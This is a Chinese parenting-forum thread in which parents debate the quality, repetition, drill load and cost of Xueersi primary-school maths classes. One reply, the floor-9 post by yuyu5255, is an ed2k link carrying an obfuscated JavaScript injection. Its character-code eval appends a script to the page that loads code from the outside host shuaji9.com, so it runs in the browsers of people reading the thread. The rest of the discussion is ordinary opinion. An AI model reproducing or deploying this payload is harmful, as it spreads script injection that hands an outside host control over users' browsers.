‹ 上一主題|下一主題 go 回復: 65 | 瀏覽: 49891 |倒序瀏覽 | 字體: tT
手機看此貼
  • 微信掃一掃 手機看此貼
  • 好內容 隨時分享到朋友圈

[ 小升初 ]

想了解學而思數(shù)學的教學

[復制鏈接]

經驗值
注冊時間
    • 媽媽網輕聊
      給生活加點料

• 媽媽網孕育
      就是好用

holdImg
    • 廣州媽媽網
      廣州媽媽網,更懂廣州媽媽

廣州媽媽網二維碼
樓主
發(fā)表于 2017-3-20 08:49 |只看該作者 | 最新帖子 | 查看作者所有帖子 | 發(fā)短消息 | 加為好友 | 字體大小: tT
想請教一下熟悉學而思數(shù)學教育的媽媽:我們在學而思剛剛報了數(shù)學課程(提高班),3年級春季班。上了幾節(jié)課,我發(fā)現(xiàn)學而思數(shù)學沒有傳說中那么好啊,老師在上課的時候是不停地把方法傳授給學生,學生缺乏一個思考的過程。不知道有沒有家長有同感呢?另外,我發(fā)現(xiàn)學而思怎么是在重復教學呢?(可能難度有提高)。 比如說,巧填符號問題,年齡問題,記得好像在學而思二年級還是三年級上學期的書本就有講過的啊,怎么在三年級下學期有講呢?是不是在螺旋式上升呢?不解。

回帖推薦

yuyu5255 發(fā)表于9樓  查看完整內容

ed2k://|file|filesize|'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'|8798/

|淡然處之_8012 發(fā)表于11樓  查看完整內容

你說的是計算小超市對不對?練功還得扎馬步呢,呵呵,只能說,你孩子還真不是塊學數(shù)學的料,找點他擅長的吧!

GeorgeQ 發(fā)表于18樓  查看完整內容

學而思學了一年數(shù)學,感覺題量也不是很大,關鍵是舉一反三,變化很多,不像小學課本上那樣機械模仿例題就可以了。計算小超市是體現(xiàn)基本功的,習慣后每天一頁十分鐘就可以限時完成。 剛剛考完了計算達人秀,筆算題給我,我自己都不敢保證在半小時內做完,同班確實還有幾個考五星的,真的是難者不會,會者不難,主要是腦子要轉過那個彎來,反應快,就能跟上,體現(xiàn)一個“巧”字。另外感覺學習風氣真的要比在學校里好很多。。 ...

|淡然處之_8012 發(fā)表于19樓  查看完整內容

呵呵,計算是學習數(shù)學最最最基礎的部分,一天60道左右的口算題你都嫌多,舍不得孩子吃苦,那真沒有必要到學而思受累。另外,每個孩子都有自己擅長的方面,做父母的,負責發(fā)現(xiàn)并培養(yǎng)孩子的特長是要點,我就事論事,我又不認識你,針對你干啥?

yqmyqm  你確定你真的旁聽過?而不是聽了假課?  發(fā)表于 2017-3-22 13:54

注冊時間
BB生日
個人覺得學而思只是輔導奧數(shù),似合參加競賽之類的,如果是三科的提分,還是卓越比較適合。

經驗值
注冊時間
BB生日
  所謂學而思杯神話只是羊群效應吧,能否脫穎而出還是要看孩子和家長背后的默默努力和拼搏。

shedole  太贊同這句話了,這次計算小達人考試,一個班的,有的考140多分,我朋友考了75分,這完全就是拼家長后面的努力吧。  發(fā)表于 2017-3-29 10:18

經驗值
注冊時間
BB生日
看來大家都很清醒,沒有被效應干擾。

經驗值
注冊時間
BB生日
一年級讀左個寒假班的漂過,講真,學而思我個人認為,距系將計算的方法(偷雞法)教給小朋友,但題海戰(zhàn)術太厲害,一年級一日100題,邊個初學者都會煩,繼而會怕的。所以,春季班我無報。我本意是想維持小朋友都數(shù)學的興趣,一個班下來,我怕了。我怕連那小小的興趣都搞無了,變成一個呆子,

yqmyqm  小超市是每日60題,一般是10分鐘內完成。  發(fā)表于 2017-3-22 13:52

Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19Rank: 19

經驗值
注冊時間
很奇怪LZ既然這學期才進去,怎么會知道一二年級學了什么。確實同樣的內容會反復出現(xiàn),但每出現(xiàn)一次都不是簡單的重復,難度有加深有更多啟發(fā)孩子思考的地方。個人覺得學而思很好,不過也不反對很多人在這里說它家壞話,其實真想學的早就在靠譜的朋友勸說下開動了。反正學家的學費又不分給我,你們說的壞話越多,以后我孩子面臨的競爭就越少:)

注冊時間
我也覺得學而思很好,這個平臺就很好,來自不同學校的小朋友同臺競技,真正的英雄不問出處:-)這是商業(yè)化的決定,覺得學而思不好的大可以不要來,對自己的選擇負責就好了。另外學而思的學費真心不貴了,三科全讀也就兩萬多一年,實在不算啥。
來自[移動wap版]

注冊時間

無奈復無奈 發(fā)表于 2017-03-20 10:17
一年級讀左個寒假班的漂過,講真,學而思我個人認為,距系將計算的方法(偷雞法)教給小朋友,但題海戰(zhàn)術太..

你說的是計算小超市對不對?練功還得扎馬步呢,呵呵,只能說,你孩子還真不是塊學數(shù)學的料,找點他擅長的吧!
來自[移動wap版]

注冊時間

流光廢舞 發(fā)表于 2017-03-20 08:56
個人覺得學而思只是輔導奧數(shù),似合參加競賽之類的,如果是三科的提分,還是卓越比較適合。
..

學而思是培優(yōu),不是補習!適合小升初志在名校民校的孩子,訂好了直升派位的,來不來隨便。
來自[移動wap版]

經驗值
注冊時間
沒有參加學而思,所以沒有發(fā)言權。
來自[廣州媽媽網Android版]

注冊時間
看完我放心了,那句話說得好:成功的路上并不擁擠
來自[移動wap版]

經驗值
注冊時間
BB生日
我家小朋友的同學,就是上學而思,他媽媽發(fā)出來的題目,確實比我家在卓越高斯的難,他是一年級就開始了。我這個是今年這個學期才開始,追趕高斯班也有壓力。希望他能跟得上。學而思的確是難,建議一開始就就讀。

經驗值
注冊時間
BB生日
回復 無奈復無奈 的帖子

問題是,你不題海,還真不能在12萬考試大軍中脫穎而出,要讓一線重點注意到你,必須要拿點干貨出來,比如希望杯、華杯的獎

經驗值
注冊時間
BB生日

親子

學而思學了一年數(shù)學,感覺題量也不是很大,關鍵是舉一反三,變化很多,不像小學課本上那樣機械模仿例題就可以了。計算小超市是體現(xiàn)基本功的,習慣后每天一頁十分鐘就可以限時完成。
剛剛考完了計算達人秀,筆算題給我,我自己都不敢保證在半小時內做完,同班確實還有幾個考五星的,真的是難者不會,會者不難,主要是腦子要轉過那個彎來,反應快,就能跟上,體現(xiàn)一個“巧”字。另外感覺學習風氣真的要比在學校里好很多。。

注冊時間

無奈復無奈 發(fā)表于 2017-03-21 08:58
回復 |淡然處之_8012 的帖子

我孩子是不是學數(shù)學的料,還輪不到你來評論。大家在討論事,你在針對人。你的..

呵呵,計算是學習數(shù)學最最最基礎的部分,一天60道左右的口算題你都嫌多,舍不得孩子吃苦,那真沒有必要到學而思受累。另外,每個孩子都有自己擅長的方面,做父母的,負責發(fā)現(xiàn)并培養(yǎng)孩子的特長是要點,我就事論事,我又不認識你,針對你干啥?
來自[移動wap版]

經驗值
注冊時間

天文數(shù)字 發(fā)表于 2017-03-20 19:08
很奇怪LZ既然這學期才進去,怎么會知道一二年級學了什么。確實同樣的內容會反復出現(xiàn),但每出現(xiàn)一次都不是簡..

謝謝你的回復。作為新生,我只是在這里發(fā)表一下這幾節(jié)課學下來的體會,同時也取取經,并沒有要說壞話的意圖。至于我為什么知道2年級學了什么,是因為我之前看過同學2年級的課本,所以才有這個疑問。僅此而已。
來自[移動wap版]
‹ 上一主題|下一主題
想了解學而思數(shù)學的教學
快速回復

回帖后跳轉到最后一頁

廣東省通信管理局互聯(lián)網清理整頓 增值電信業(yè)務經營許可證:粵B2-20220217粵ICP備09174648號粵網安備案號:4406043011754公安機關備案號:44010602000095 Copyright 2004-2024 盛成科技 All Right Reserved版權所有    版權保護投訴指引

互聯(lián)網藥品信息服務資格證書 電子營業(yè)執(zhí)照 網絡文化經營許可證粵網文[2016]7051-1702號

違法和不良信息/涉未成年人有害信息舉報電話:020-85505893/18122325185 舉報郵箱:kf@mama.cn 涉未成年人有害信息舉報專區(qū) 中國互聯(lián)網不良信息舉報中心
網絡內容從業(yè)人員違法違規(guī)行為舉報:kf@mama.cn 開發(fā)者:廣州盛成媽媽網絡科技股份有限公司 應用版本:11.12.0 應用涉及權限APP隱私協(xié)議

回頂部